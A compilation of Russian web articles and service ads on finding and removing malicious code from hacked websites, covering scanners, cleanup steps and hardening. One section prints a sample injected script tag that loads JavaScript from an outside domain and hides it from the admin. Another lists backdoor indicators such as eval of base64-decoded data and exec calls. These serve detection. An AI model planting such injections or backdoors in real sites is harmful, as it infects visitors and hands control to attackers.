Вирусы на сайте: как найти и вылечить? Сайты с вирусами


Как вылечить вирус на сайте.

В настоящее время огромное число сайтов заражено вирусами. Обычно вебмастера называют вирусами любой вредоносный код, который тем или иным образом вредит работе сайта или посетителей. Одни вирусы выполняют безобидный редирект на сайты варезных приложений, азартных игр или сайты для взрослых. Другие, используя уязвимости в браузерах или плагинах, проникают на компьютер посетителя и заражают операционную систему, выполняя разрушительные операции. Но не важно, насколько вредоносным оказывается действие конкретного вируса, любой вредоносных код необходимо убрать с сайта как можно раньше и вот почему.

Наличие вируса на сайте приводит к тому, что последний пессимизируется поисковой системой, теряет позиции в поисковой выдаче, а трафик существенно падает. Падение посещаемости может быть связано с двумя проблемами:

  1. сайт попал в базу поисковой системы, и маркирован как подозрительный или вредоносный
  2. сайт попал в базу антивируса (например, Касперского)

Итог один: сайт теряет посещаемость, лояльность пользователей и поисковых систем. Для того, чтобы восстановить позиции или удалить сайт из базы «подозрительных», придется потратить достаточно много времени и сил.

Оперативно и качественно вылечить сайт от вирусов, исключив повторное заражение, всегда помогут специалисты, которые ежедневно удаляют с сайтов вредоносный код, быстро фиксируют его видоизменения и анализируют способы хакерских атак. Профессиональная помощь в вопросе лечения и защиты веб-проектов помогает сэкономить время на неудачные эксперименты, а самое главное, избежать повторных взломов и заражений.

Быстро (до 48 часов), с гарантированным результатом и по фиксированной цене проблему безопасности сайта помогут решить специалисты компании «Ревизиум», достаточно заполнить форму заявки на лечение.

Заказать

Сайт заражается вирусом несколькими способами:

  1. злоумышленник взламывает сайт через уязвимости в скриптах или на сервере, модифицирует настройки сервера, шаблоны или php скрипты для того, чтобы на странице появлялся вредоносный код на javacript, или выполнялся редирект при определенном условии на сторонний сайт.

    Для того, чтобы это не произошло, нужно укреплять безопасность сайта: регулярно обновлять версию операционной системы на сервере и скриптов системы управления сайтом, грамотно выставлять привилегии для директорий, использовать безопасные настройки PHP/Perl на сервере, регулярно менять пароли от панели администратора и т.п.

  2. вирус на компьютере владельца сайта перехватывает пароль от FTP, отсылает его злоумышленнику или боту, который в свою очередь соединяется по FTP и заражает сайт (см. п 1)

    Для того, чтобы этого не произошло, нужно использовать безопасное соединение SFTP вместо FTP, не хранить пароли в FTP-клиенте, чаще менять пароли от FTP, проверять компьютер антивирусом.

Обнаружить вирус помогают поисковые системы, браузеры, антивирусы и иногда посетители сайта. Поисковая система, обычно, присылает отчет о том, что сайт представляет угрозу для посетителей через интерфейс вебмастера. Антивирус или браузер (например, Chrome) блокирует доступ к зараженному сайту, который находится в базе инфицированных сайтов, и показывает пользователю предупреждение при заходе на такой ресурс. Владельцу сайта рекомендуется использовать инструменты вебмастера Яндекса и Гугла для того, чтобы отслеживать работоспособность своих ресурсов. Также в обнаружении вредоносного кода хорошо помогает наблюдение за трафиком: заметное снижение посещаемости сайта может быть сигналом к наличию редиректа или заражению сайта.

Многие владельцы сайтов даже не подозревают о наличии вирусов на своих ресурсах, поскольку вредоносный код может срабатывать при определенных условиях (какое-то конкретное время, количество кликов на странице, заход с определенного браузера или мобильного устройства). Такие вредоносы могут существовать на сайте месяцы, а то и годы. Для их обнаружения необходим как внешний анализ работы сайта, так и внутренний анализ состояния скриптов и сервера.

  1. Для внешнего анализа работы сайта подойдут браузер Chome, антивирус Касперского и две панели вебмастера (Яндекс.Вебмастер и Google Webmaster Tool). Браузер Chrome кроме богатого инструментария вебмастера (включая сетевой анализатор и сниффер трафика) имеет встроенный сервис Google Safe Browsing, который покажет, находится ли зараженный сайт в базе Google Safe Browsing.
  2. Для внутреннего анализа рекомендуется использовать специализированные инструменты поиска вредоносных скриптов и следов взлома сайта:
    • AI-Bolit для поиска шеллов, вирусов и других вредоносных скриптов среди скриптов сайта
    • Rkhunter для поиска руткитов на выделенном (VDS/VPS) сервере
    • ClamAV для поиска вирусов под Unix
  1. Проверьте свой компьютер коммерческим антивирусом с регулярно обновляемыми базами
  2. Смените все пароли (доступ к хостингу, к панели администратора сайтов)
  3. Выполните внешний и внутренний анализ сайта, описанные в предыдущем разделе
  4. Удалите вредоносный код из шаблонов и скриптов
  5. Укрепите безопасность сервера и скриптов (советы по усилению безопасности можно посмотреть в группе «Безопасность сайтов» http://vk.com/siteprotect)
  6. Следуйте рекомендациям для предотвращения повторного заражения в статье «Как уберечь сайт от заражения вирусом»

Если вы достаточно уверенно администрируете сервер и являетесь опытным вебмастером, вы сможете легко справится с вредоносными скриптами на сайте.

Также вы всегда можете обратиться к профессионалам, которые помогут вам избавиться от проблем с вирусами, а также защитить сайт от взлома и повторного заражения.

Обсуждаем и комментируем

revisium.com

Вирус на сайте. Как его найти и удалить? – SEO

Как найти и обезвредить вирус на сайте, основные причины заражения и способы ликвидации вирусов.

 

Вирус на сайте uCoz – это частое и довольно распространенное явление. В основном он появляется на сайтах тех вебмастеров, которые совершенно не разбираются в HTML коде и любезно вставляют в шаблоны все скачанные из интернета скрипты без предварительного анализа и проверки.

Вирус на сайте негативно влияет на все факторы продвижения и монетизации сайта.

Во-первых, если у посетителя во время просмотра страниц «заругался» антивирус, то вполне вероятно, что он сразу же закроет зараженную страницу, и как следствие – увеличение показателя отказов от сайта.

Во-вторых, поисковая система, обнаружившая на сайте вредоносный код, обязательно пометит сайт в сниппете как потенциально опасный, а это потеря посещаемости как минимум в 5 раз.

В-третьих, вебмастер зараженного сайта не получит никакой прибыли с него в виду отсутствия посещаемости, а даже если она осталась – хорошие рекламодатели и партнерские программы вряд ли захотят с ним сотрудничать.

 

 

Как происходит заражение сайта вирусом?

Заражение сайта вирусом может проходить несколькими путями:

  1. Зараженный компьютер получил ФТП доступ к сайту и внедрил в него вредоносный код. Это явление достаточно редкое и в случае, если ваш сайт «заразился» именно таким способом – сообщите об этом на официальном форуме системы uCoz, чтобы разработчики приняли меры по устранению «дыр» в системе безопасности сайтов.
  2. Вебмастер установил рекламные блоки (например, тизерной партнерки), ссылки в которых числятся в базе антивирусов как потенциально опасные страницы.
  3. Вебмастер скачал и установил на сайт зараженный скрипт, шаблон, вид модуля или другие участки шаблона добровольно. Это самая распространенная причина заражения сайта вирусом.

 

Не спешите писать на форум или в службу поддержки хостинга! 

Сначала разберитесь с причинами появления вируса, а так же попытайтесь сами решить проблему без подключения к ней посторонних людей. Найти и удалить вирус не сложно!

 

 

Как найти вирус на сайте?

Чтобы самостоятельно обнаружить вирус на сайте – вы должны знать как он выглядит. В основном каждый вирус – это JS скрипт, который проводит подключение зараженного файла со стороннего сервера. А соответственно этот скрипт должен содержать в себе внешнюю ссылку.

 

Внимание! Смотрите на имена файлов JS и домены на которые они ссылаются! Читайте статью до конца перед тем, как приступать к активным действиям! Иначе рискуете испортить сайт!

 

Примерный вид вирусного скрипта будет таким:

<script type=”text/javascript” src=”http://bot1.gbk.ru/sript/script_site.js”></script>

Подобная конструкция может находиться в шаблонах вашего сайта в любых модулях и в любом участке шаблона, даже в составе других скриптов (например в коде Яндекс.Метрики), а также быть «спрятанным» от администратора условием с переменной $USER_ID$ (чтобы администратор не видел действия скрипта).

<?if($USER_ID$ == ‘4’)?><?else?> <script type=”text/javascript” src=”http://bot1.gbk.ru/sript/script_site.js”></script><?endif?>

Злоумышленники специально прячут вредоносный код в «заковырные» места, чтобы усложнить администратору задачу по его поиску. Если вы более-менее умеете читать код шаблона, то обнаружить вирус не составит проблем (даже в «заковырном месте»).

Второй способ обнаружить вредоносный скрипт – это воспользоваться помощью антивирусных программ. Любой антивирус, посчитавший ваш сайт зараженным, выдаст специальное предупреждение, в котором будет полное описание зараженного файла. Скопировав имя этого файла, можно запросто найти его в коде шаблона той страницы, на которую «ругается» антивирус (Ctrl + F) и принять соответствующие меры.

 

 

Как предотвратить появление вирусов на сайте?

Чтобы не допустить заражения сайта вирусом советую воспользоваться несколькими рекомендациями:

  1. Установите на компьютер антивирус.
  2. Регулярно (раз в 1-2 месяца) проводите сканирование всех компьютеров, с которых вы заходили в панель управления сайта с помощью бесплатных антивирусных утилит (например, от Лаборатории Касперского).
  3. Никогда не передавайте свои логины и пароли от сайта посторонним лицам.
  4. Регулярно меняйте пароли (раз в 3-6 месяцев), но не запутайтесь в этом процессе, иначе сами не сможете попасть на свой же сайт.
  5. Перед установкой любого скрипта или участка шаблона проверяйте наличие в них внешних ссылок. Все внешние ссылки нужно менять на свои (для этого приходится сначала скачивать по эти ссылкам файлы, а потом «перезаливать» на свой сайт).
  6. Если ссылки в скрипте «нормальные» и ведут на рабочие и авторитетные сайты, то откройте по ссылке страницу с JS кодом, сохраните ее на своем компьютере с тем же именем, залейте этот файл в файловый менеджер вашего сайта (например, в папку с именем JS), и после этого подключите ссылку в скрипте уже ссылаясь на свой сайт, а не на посторонний. Тем самым вы гарантируете работоспособность скрипта в будущем, а так же обеспечиваете защиту сайта (в противном случае, админ стороннего ресурса может запросто заменить исходный рабочий скрипт зараженным, «залив» его в свой файловый менеджер под тем же именем).

 

Чтобы бороться с вирусами на сайте – нужно знать врага в лицо! Вирусы имеют разный вид и прячутся в самых непредсказуемых участках шаблона. Определить и ликвидировать вирус – достаточно просто, нужно всего лишь включить мозги и тщательно проанализировать каждую страницу своего сайта на наличие JavaScript скриптов с заключенными в них внешними ссылками.

 

Как правило, вирусы не имеют нормального «человеческого» имени, а представляют нелепый набор латинских букв и цифр типа «jxiot1.js». Сайты, на которых они лежат, являются субдоменами основного и уже нерабочего сайта, и так же содержат подозрительные доменные имена, например bot3.gfdx.net и т.д. Если вы встретили подобные имена в скриптах, будьте уверены – это вирусняк!

seo-for-ucoz.com

Как удалить вирус на сайте самому, плагины для защиты и рекомендации

Приветствую вас дорогие друзья! Данная статья является вынужденной и бессрочной, так как несколько моих сайтов, в том числе и этот seo блог, были заражены коварным вирусов!

Вирусы на сайте, удаление вируса

Данное происшествие могло поставить крест на будущем продвижении сайта, слава богу все обошлось, и теперь я хочу поделиться реально работающими методами удаления вирусов с сайта на Worpdress!

И так, сначала начну с небольшого и очень неприятного рассказа, который, быть может, предотвратит заражение ваших сайтов.

Как я узнал, что на моем сайте вирус?

В один, как оказалось позже, не совсем прекрасный день, я зашел на один из своих сайта, первое, что я сразу заметил – это скорость загрузки сайта, естественно сайт работал медленнее обычного.

После нескольких секунд пребывания на сайте, вылезло тревожное сообщение от моего антивируса Nod32, я сделал снимки этих сообщений – вот они:

Это сообщение вылезало при просмотре сайта в браузере – Mozilla Firefox.

Вирус на сайте

А это вылезало при просмотре через Google Chrome.

Вирус

Такие сообщения появлялись на страницах сайта, а также в панели администратора.

Пробовал разные способы лечения, пришлось даже временно сменить дизайн, но ничего не помогало.

При проверке сайта через разные интернет сервисы – вирусов обнаружить не удавалось, но он все же был!

Каким образом произошло заражение?

Здесь все достаточно просто: сначала был заражен мой компьютер, после чего, видимо при добавлении новых файлов на сайт, был занесен и вирус.

То есть в моем случае вина лежит полностью на мне. Но бывает так, что сайты заражаются и после хакерской атаки, когда взламываются сайты.

План действий, перед удалением вируса!

1. Первое, что нужно сделать – это сканирование вашего компьютера!

Рекомендую это делать двумя антивирусами – сначала запускаем полное сканирование  при помощи Nod32, потом скачиваем Dr.Web CureIt и проверяем компьютер им.

Естественно, все найденный вирусы следует удалить.

2. Второе. Меняем пароли от:

– FTP клиента

– Базы данных

– Администраторской панели WordPress

– Электронной почты (связанной с WP)

Если этого не сделать, то все операции, представленные чуть ниже, окажутся бессмысленными!

Внимание! Не в коем случае никогда не сохраняйте пароли в своих браузерах!

Удаление вируса!

1. Делаем полный бекал сайта (ов), начиная с WWW директории (то есть с той папки, в которой находится корень сайта).

Бекал должен быть в виде архива!

2. Сканируем этот архив все тем же антивирусом – Nod32 (либо каким-нибудь другим).

Мой антивирус нашел около 430 вирусов (троянов и шпионских программ)!.

В основном, все вирусы находились в файлах плагина, эти плагины я сразу удалил, непосредственно через менеджер файлов на своем хостинге.

Также были заражены и некоторые файлы темы (шаблона).

3. Удаляем прежнюю – зараженную тему, запомнив её название, ставим временно новый шаблон, потом скачиваем ту, которая у вас стояла (та, которая вам нужна).

4. Распаковываем скачанный ранее архив и на всякий случай сканируем его содержимое еще раз!

5. На хостинге заходим в папку plugins, она будет находится примерно вот в такой директории:

ваш_сайт.ru/wp-content/plugins

 

Делаем снимок экрана со списков всех плагинов, либо переписываем их название на листок.

6. Скачиваем (новые) все эти плагины в отдельную папку своего компьютера – обязательно с официального сайта WordPress, а не с каких-нибудь левых сайтов!

?

Внимание! Перед следующим шагом будьте аккуратны, я надеюсь, что вы проделали все первые пять шагов, скачав полный бекал и сделав снимок с плагинами!

7. Теперь заходим в папку wp-content (также на сервере) и удаляем папку plugins (папку с плагинами).

8. Создаем в папке wp-content, естественно, новую папку, под названием – plugins.

9. Теперь заходим в панель администратора WordPress, и вручную устанавливаем все плагины, при этом, делая их настройку.

Вот в принципе и все! После этих действий, зараженных файлов остаться не должно, по крайней мере, именно это мне и помогло!

Общие рекомендации

  • Старайтесь скачивать программного обеспечение только с официальных сайтов.
  • Всегда обновляйте свой антивирус.
  • Вовремя делайте бекал базы данных.
  • WordPress Database Backup – отличный плагин, настроив который, можно получать копию БД на электронную почту, например, каждую неделю.

  • Не забывайте делать полную копию сайта, чтобы, в случае подобной неприятной ситуации, вы бы могли просто заменить исходные файлы.
  • У меня, к сожалению, не оказалось под рукой свежей копии сайта.

  • Если пользуетесь FTP клиентом, например, таким как – FileZilla, то никогда не сохраняйте в нем пароли – все данные вносите в клиент при каждом новом сеансе подключения к серверу!
  • Не используйте незнакомые java скрипты и программные коды.

Ну что же дороги друзья, на этом у меня все, будьте осторожны и выполняйте советы по безопасности сайтов.

Ваш Сергей Оганесян, до новых встреч!

Если вам нужна помощь в создании какого-либо функционала, сайта, сервиса, тестов или калькуляторов, то готов помочь, подробнее на странице услуг.

sergey-oganesyan.ru

методика лечения и настройка безопасности

Зараженный ресурс рассылает спам, вредит компьютерам ваших клиентов, портит выдачу в поисковых системах и т. д. Вы обязаны заботиться о его безопасности, если не хотите потерять клиентов, позиции и репутацию.

Не знаете, что и как делать? Не проблема, эта статья снимет все вопросы и поможет разобраться в диагностировании, лечении и предотвращении заражения.

Как понять, что произошло заражение сайта

Самые популярные маркеры того, что с сайтом что-то идет не так:

  • ресурс заблокирован антивирусом или интернет-браузером;
  • произошли резкие изменения в статистических параметрах сервера или индексации поисковых систем;
  • сайт находится в черном списке Google или другой базе нежелательных адресов;

    пример выдачи Яндекса с вирусным сайтом

  • сайт не работает должным образом, выдаются ошибки, предупреждения;
  • в коде сайта есть подозрительный текст.

    картинка кода сайта с вирусной вставкой

Однако проверить свой сайт стоит в любом случае, даже если вы ничего из вышеперечисленного не замечали. Выдохнуть спокойно можно, когда подозрения на наличие вирусов на сайте не подтвердятся. Хотя нет, только после того, как примете превентивные меры защиты.

Наиболее частые источники или причины заражения

Основных причин и факторов, по которым ваш сайт может подхватить вирус и распространять его после этого по всему Интернету, не так и много. Ниже приведен список основных и наиболее встречающихся.

  • использование вирусного ПО для кражи учетных данных, доступов от FTP, хостинга или панели управления сайтом;
  • уязвимые компоненты в популярных CMS-платформах, например, Joomla, Wordpress, Bitrix, osCommerce;
  • брутфорс – взлом пароля перебором.

Теперь мы знаем, что сайт может быть заражен как по вашей вине, так и благодаря стараниям сторонних «доброжелателей». Самое время рассмотреть, пожалуй, главное – идентификацию проблемы и ее устранение.

Что и чем проверять, и как лечить

Есть несколько подходов по выявлению причины проблемы и также несколько советов по ее излечению. Как и в других сферах, нет 100% гарантии, что проверка одним способом поможет решить все косяки. Мы советуем для надежности использовать несколько методов.

  1. Автоматическая проверка на вирусы средствами хостинга. Конечно, данные модули не являются панацеей, но в большинстве случаев определят заражение и укажут проблемные файлы.
  2. Тестирование через программу Ai-bolit от revisium.com. Наиболее современная из всех существующих программ на данный момент. Она позволяет вычислить до 90% проблем. А там уже по факту обнаружения можно подбирать и метод исправления.
  3. Если в коде сайта вы заметили какие-то посторонние подозрительные символы, куски кода и т. д., можно пользоваться специальными PHP-скриптами. Например, Far от Secu.ru. Они помогут найти файлы, которые содержат эту маску. После обнаружения надо провести чистку файлов от найденного мусора. Но для данного метода нужны определенные знания в области программирования и файловой структуры сайта.
  4. Полезно также проверить загруженную копию сайта на своём компьютере при помощи антивируса, предназначенного для локального компьютера. Современные антивирусы имеют развитый эвристический модуль, который позволяет с легкостью выявить вредоносные коды, поражающие сайты. Наиболее популярный на данный момент – rescan.pro.
  5. Также можно проверить сайт через вебмастер Яндекса, Mail, Bing, Google. Если на сайте будет обнаружена подозрительная активность, в панели вебмастера появится соответствующее сообщение и общие рекомендации по дальнейшим действиям.
  6. Периодически проверяйте страницы вашего сайта в индексе поисковых систем и по сниппету смотрите на содержание (для большого сайта). Если сайт небольшой (до 50 страниц), можно посмотреть каждую из страниц в сохраненной копии. Также рекомендуем периодически проверять файл .htaccess на наличие постороннего кода, который отправляет пользователей и роботов на разные виды контента (клоакинг). По аналогичной схеме работает часть дорвеев, но только в этом случае пользователю показывается тот же контент, либо производится его 3хх редирект на нужную страницу злоумышленника. В этом случае проверьте правильный ответ сервера страницы, при необходимости устраните проблему, в результате которой отдается неверный ответ. Стоит добавить правила в robots.txt для закрытия от индексации ненужных вошедших в индекс страниц, если взлом произошел.

    Картинка, выдача сайта в Google зараженного дорвеем

  7. Важно проверять и состав пользователей, которые зарегистрированы на сайте. В первую очередь проверяем имеющих права к редактированию сайта. Если есть посторонние пользователи, их удаляем, отключаем права на редактирование и производим поиск уязвимости, выясняя, каким образом данный пользователь был добавлен.

Когда проверили сайт, нашли проблемы и устранили их, необходимо сменить пароли ко всем аккаунтам (панели управления хостингом и CMS, FTP, SSH, и т. д.).

Как защитить сайт?

Как уже неоднократно говорилось выше, лучше предупредить заражение, чем потом его лечить и исправлять последствия. Поэтому настоятельно рекомендуем соблюдать следующие меры безопасности.

  1. Делайте резервные копии сайта. Желательно, чтобы период копирования был не менее 6 месяцев, т. к. при запущенной стадии заражения незатронутые вирусом файлы могут быть только в самых ранних версиях.
  2. Используйте криптостойкие пароли. Их желательно ежемесячно обновлять.
  3. Cкачивайте и устанавливайте актуальные версии ПО, регулярно их обновляйте. Своевременно устанавливайте все необходимые патчи, это поможет снизить риск атаки с использованием эксплойтов.
  4. Не будет лишней и установка плагинов или компонентов с защитными свойствами. Например, изменяющие адреса админки или блокирующие IP вредителей, которые пытаются подобрать пароль. Можно добавить двойную авторизацию с помощью файлов *.htpasswd, отключив стандартный модуль восстановления пароля.
  5. Настройте автоматическую проверку вашего сайта средствами хостинга.
  6. Установите надежный антивирус на все компьютеры, с которых работаете с сайтом.
  7. Не пересылайте пароли и запретите это делать всем сотрудникам, работающим с сайтом, любыми каналами связи (ВКонтакте, Facebook, Skype, различные мессенджеры и т.д.). Регулярно меняйте пароль от почты, с которой связан ваш сайт.
  8. Повысьте безопасность специальными правилами в файле *.htaccess. Например, запретите php в папках, загружаемых пользователем через сайт, закройте загрузку исполняемых файлов.
  9. Дополнительно можно ограничить показ сайта только в странах с вашей аудиторией. Очень часто преступники пользуются программами, шифрующими их местоположение IP других стран.
  10. Если не используете SSH, то лучше вообще отключите его.

Выводы

К сожалению, не существует той самой таблетки, которая избавит вас от заражения раз и навсегда. Кибер-преступники не сидят на месте и изобретают новые способы, находят новые дыры, пишут новые вирусы. Однако каждый может повысить надежность своего сайта, соблюдая основные правила безопасности, поддерживая чистоту сайта и компьютера.

Ваш сайт уже заражен, а вы не можете найти причину или не знаете, как ее устранить? Или хотите проверить ресурс и убедиться, что с ним все в полном порядке? С радостью поможем. Просто оставьте заявку на проверку.

© 1PS.RU, при полном или частичном копировании материала ссылка на первоисточник обязательна.

Понравилась статья?

90 9

Сожалеем, что не оправдали ваши ожидания ((Возможно, вам понравятся другие статьи блога.

Понравилось? Поделись!

1ps.ru

Как самостоятельно бесплатно удалить вирус с сайта

Инструкция подходит для DLE, Bitrix, Drupal, Joomla, ipb, vbulletin, phpBB, ucoz и других cms. В инструкции делается упор на очистку сайтов на LAMP (как наиболее распространенная технология), но работа с сайтами на ASP.NET и других технологиях в основном аналогична. В данной инструкции предполагается, что Ваш собственный компьютер полностью чист от вирусов и локальная сеть, в которой Вы находитесь, безопасна. Иначе необходимо сначала очистить от вирусов свой компьютер. Также предполагается вледение языком программирования, на котором написан сайт, так как без этого нет смысла браться за очистку.

Перед началом работы по очистке сразу же ставим фильтр входящих данных из раздела "защита". Иначе новое заражение может произойти ещё до того, как вы закончите лечить старое.

1. Диагностика.

Диагностика проводится по следующей схеме, от простого к сложному:

1.1 Скачайте файлы сайта к себе на компьютер, и проверьте их своим обычным локальным антивирусом, например, Касперским. Удалите подозрительный код и тех файлов, на которые антивирус сработает. Обязательно сделайте резервные копии любых изменяемых вами файлов и всего сайта!

1.2 В исходном коде html страницы ищем вхождения слов "iframe" и "javascript". Исследуем найденные фреймы и внешние скрипты на предмет чужеродности, не принадлежности к нашему сайту. Особенно подозрительными являются iframe малой или нулевой ширины и высоты, а javascript - с использованием eval, unescape, String.fromCharCode, а также подвергнутый обфускации. В javascript особое внимание надо обратить на document.write с вписанием другого javascript или iframe, либо вписанием meta-редиректа, а также javascript-редирект. В некоторых случаях вирусный код маскируется под счетчики посещаемости. Иногда производится полная замена обфусцированной javascript библиотеки наподобие jquery на такую же, но содержащую вирус. В таких случаях необходимо сверить размеры активной библиотеки с размерами того же файла в имеющейся у Вас резервной копии сайта. Если в iframe, javascript или в редиректе фигурирует любой чужой домен (не Ваш и не размещенный там Вами) - это сигнал тревоги, даже если на домене пусто или там нормальный сайт. Вирусы очень часто идут "матрешкой", когда реальное вредоносное содержимое выскакивает только на третьем или пятом редиректе или фрейме.

1.3 Проводим такое же исследование по подгружаемым внешним javascript файлам. Во внешних css проводим поиск behavior, содержащих чужеродный код.

1.4 Если на сайте есть картинки, подгружаемые с других сайтов - проверяем, что выдается при запросе броузером этих картинок. При этом реферрер и агент должны быть как при обычном открытии страницы Вашего сайта с этой картинкой. Если вместо картинки выдается редирект, запрос пароля или иное чужеродное содержимое - это как правило вирус.

1.5 Перечисленные в пп. 1.1-1.3 действия необходимо выполнить с запросом страницы и скриптов несколько раз, в идеале с разных ip, с разными cookies и разными user-agent (броузерами) поскольку вирусный код может выдаваться случайным образом либо только тем броузерам, которые уязвимы, либо только поисковику, либо по иному критерию.

1.6 Добавляем сайт в Яндекс-вебмастер и Google-вебмастер, в некоторых случаях эти сервисы дают указание конкретного вредоносного кода, либо доменов, с которых подгружается вирус.

1.7 Если Вы зашли на зараженный сайт с включенным javascript в броузере (чего вообще-то лучше не делать), то Ваша антивирусная программа может дать список угроз, которые были обнаружены при посещении сайта. Из этих данных также можно выделить список вирусных доменов.

1.8 Смотрим коды http-ответов сервера на предмет редиректов разными user-agent и с разных ip адресов, поскольку зачастую редирект выдается случайным образом либо используется клоакинг. Иногда вирус ведет дневник и выдает редирект или попап только один раз каждому посетителю.

2. Удаление вируса.

Знание, какой именно код вирус выдает посетителям сайта, помогает найти на сервере источник проблемы. Если в ходе диагностики выдаваемый посетителю вредоносный код не был конкретизирован - не беда, очистка может быть успешно проведена и без этого, просто будет намного сложнее.

2.1 Скачиваем себе на локальный компьютер все файлы сайта, делаем резервную копию перед проведением очистки.

2.2 Проводим полнотекстовый поиск (по самим файлам, а не только по их заголовкам), ищем вхождения найденного в пп. 1.1-1.3 и найденных в пп. 1.5 и 1.6 вирусных доменов. Альтернативный вариант - вести поиск прямо на сервере специальным серверным скриптом.

2.3 С помощью ssh команд либо серверного скрипта находим на сервере все файлы сайта, которые были изменены в день заражения сайта и изучаем их на предмет внешних нежелательных дополнений. Это могут быть:

  • include файлов с вирусных доменов (не зависимо от того, разрешен ли удаленный include по данным phpinfo),
  • eval полученных с других сайтов данных,
  • eval декодированных функцией base64_decode данных,
  • обфусцированный php-код,
  • переопределенные функции,
  • include или eval внешних данных, передаваемых скрипту через глобальные массивы GET, POST, COOKIE, SERVER ('HTTP_REFERRER','HTTP_USER_AGENT' и др.), обычно являющееся backdoor,
  • посторонние коды ссылочных бирж (часто целью взлома сайта является продажа с него ссылок),
  • http-заголовки с редиректом на вирусные домены, отправляемые функцией header,
  • exec, system, popen, passthru и другие функции, выполняющие вызов программ, если их использование не предусмотрено cms. Если cms не задействует данные функции, а также функцию eval, то лучше вообще их отключить в php.ini,
  • бэкдоры в триггерах mysql,
  • auto_prepend_file или auto_append_file в php, с бэкдором или вирусным кодом,
  • в очень редких случаях команда запуска лежащего в tmp вирусного файла запускается пользовательским crontab.

При анализе нежелательных дополнений может помочь знание кода, выясненого в ходе диагностики (п.1).

Помимо выдачи посетителям вредоносного содержимого, перечисленные выше чужеродные вхождения могут представлять собой web shell или backdoor, с помощью которых злодей контролирует Ваш сайт.

2.4 Делаем дамп базы данных, и изучаем аналогично п.1.1, но с учетом того, что в базе код может быть преобразован в мнемоники и вместо <iframe> будет &lt;iframe&gt;

2.5 Удаляем все чужеродные вхождения, обнаруженные в ходе работы по перечисленным выше пунктам.

2.6 Проверяем работоспособность сайта, его функционал. Иногда вирус затирает собой важные файлы или нарушает их синтаксис, и после очистки обязательно надо все восстановить. В очень редких случаях вирус затирает все так, что файлы сайта уже невосстановимы. Хорошо, если есть копия у хостеров или подключена услуга резервное копирование.

2.7 Создаем резервную копию очищенного сайта. В случае повторного заражения можно будет восстановить сайт из этой резервной копии.

Если остановиться на этом, то на следующий день либо в пятницу вечером на этой же неделе произойдет повторное заражение сайта и все с начала. Поэтому необходимо двигаться дальше.

3. Выясняем и ликвидируем причину заражения.

3.1 В первую очередь необходимо проанализировать лог веб-сервера и лог ftp, найдя в них время, предшествовавшее заражению. Если имеется лог ошибок php и лог командного интерпретатора, они тоже могут оказаться полезны. Иногда в логах бывает достаточно данных, чтобы определить источник заражения сайта. Но нельзя ограничиваться только закрытием первоначальной проблемы, необходим комплексный подход.

Самые распространенные пути заражения:

  • похищение ftp паролей,
  • уязвимости в движке (cms),
  • заражение от соседних сайтов на том же сервере,
  • уязвимость утилит на сайте или на сервере.

3.2 Похищение ftp паролей. Причины бывают разные:

  • использование ftp через бесплатный wifi, зараженный похищающим пароли вирусом, или с компьютера в зараженной локальной сети. Чтобы избежать такой утечки паролей, целесообразно поверх бесплатного wifi или подозрительной локальной сети использовать платный VPN с шифрованием.
  • похищение паролей из ftp-клиента (например, похищение файлa wcx_ftp.ini из Total Commander) с помощью сайтового вируса, вируса в пиратской программе или вируса на флешке.
  • pfishing ftp-паролей (при входе на сайт seo-утилит или иной подобный сервис предлагают ввести ftp логин и пароль, либо под видом представтелей хостера под разными предлогами просят посетить якобы страницу смены ftp-пароля).

3.3 Уязвимости в движке (CMS).

Многие CMS все ещё содержат уязвимости типа SQL injection, source include, xss и др. Обычно сообщения об обнаружении таких уязвимостей появляются на сайтах поддержки данных CMS, например, http://dle-news.ru/bags/. В ходе очистки сайта необходимо закрыть все уязвимости, описанные на сайте разработчика CMS, а также проверить движок на наличие уязвимостей, добавленных туда при установке модов или ином дополнении функционала. Как движок, не имеющий подобных явных проблем можно порекомендовать UMI CMS.

Помимо собственно дыр в движке бывают ещё уязвимости, связанные с сочетанием определенных настроек движка и/или определенных настроек сервера. Например, если настройки сайта позволяют посетителям постить на сайт картинки с других сайтов, то это автоматически увеличивает риск проблемы, упомянутой в п.1.3. Некоторые CMS не имеют явных уязвимостей, но в случае несоответствия настроек сервера системным требованиям эти CMS могут быть очень уязвимы. В ходе очистки необходимо уточнить соответствие сервера требованиям безопасности конкретной CMS.

3.4 Заражение от соседних сайтов на том же сервере.

Если Вы подключаетесь к своему сайту по ftp и не видите других сайтов, кроме своего - это ещё не значит, что от Вас нет доступа к соседям и от них нет доступа к Вам. Необходимо подключиться по ssh (если хостер дает такую возможность) и проверить, не видны ли файлы других пользователей. Также пробуем подняться выше своей директории php файл-менеджером, или perl, или программами на других языках, работающих на этом сервере. Если такая возможность подняться выше и перейти в папки других пользователей есть - необходимо сменить хостинг, так как очистка в рамках отдельно взятого сайта в таких условиях невозможна.

3.5 Движок сайта может быть хорошим, но при этом у хостера могут стоять утилиты управления базами данных или скрипты статистики, имеющие уязвимости или пригодные для брутфорса. Это может быть phpMyAdmin с единой авторизацией для всех клиентов, что в сочетании с короткими паролями может дать успешный взлом управления базами и как следствие - добавление вирусного кода в хранящиеся в базе статьи или шаблоны. По возможности необходимо закрыть эти пути проникновения вирусов. К сожалению, это зачастую также означает смену хостера.

4. Меняем все пароли: ftp, ssh, mysql, пароли на администрирование сайта (пароли cms).

Зачем все так сложно? Я вот просто убрал из шаблона сайта строчку с вирусом, и у меня теперь все хорошо.

Вам повезло. Но нельзя считать хакера глупышом. Обычно если вирус не дотерт, он возвращается. И возвращается в значительно более хитром и зашифрованном виде, и его удаление становится на порядок более сложной задачей.



antivirus-alarm.ru

Удалить вирус с сайта

— Вы переживаете за безопасность своего бизнеса?— Ваш сайт подвергается атакам хакеров?— Вы теряете клиентов из-за неполноценной работы сайта?

У нас есть, то что вам необходимо!

— Найдем и удалим все вирусы и другой вредоносный код с вашего сайта.— Снимем блокировку сайта на хостинге.— Обеспечим безопасность сайта.— Восстановим работу вашего сайта после взлома.— Защитим от возможного взлома сайта в будущем.— Результат уже СЕГОДНЯ.— Гарантия на выполненные работы — 1 год.

Поддерживаемые все системы управления сайтом. Включая:

Чем страшны вирусы на сайте?

Заражение сайта вирусами может привести к следующим последствиям:— Сайт заблокируют в поисковых системах и системах контекстной рекламы.— Резко упадет посещаемость вашего сайта. А, как известно, нет посетителей – нет клиентов.— Сайт заблокируют со стороны хостинг провайдера.— Через ваш сайт могут рассылать спам от вашего имени.— Все посетители вашего сайта заразятся вирусами.

Часто задаваемые вопросы:

Через какое время Яндекс (Google) поймет что на сайте нет вирусов?— 1 сутки после проведения работ.

Как происходит оплата?— После проведения работ. Любым удобным для вас способом.

